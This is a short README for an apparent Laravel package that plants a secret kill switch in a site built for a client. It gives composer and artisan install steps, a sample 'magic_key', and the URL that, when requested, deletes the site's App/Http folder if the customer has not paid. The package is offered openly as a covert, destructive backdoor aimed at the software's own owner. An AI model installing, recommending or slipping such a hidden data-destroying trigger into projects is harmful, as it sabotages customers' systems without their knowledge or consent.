Suppose the customer has not paid and you want to deactivate the site if the deadline is reached and he does not pay!
- Install
composer require webpajooh/laravel-repoman
- Publish repoman.php
php artisan vendor:publish
- Edit config/repoman.php
There is a magic_key
option in the configuration file and it is commented by default:
'magic_key' => 'Lbs96hv7Fzn28QLSXaIKtAXwlHSDU'
You can change the value, and use it when you want:
example.com/?magic_key=Lbs96hv7Fzn28QLSXaIKtAXwlHSDU
If we send a request to this link, we will lose the App/Http folder!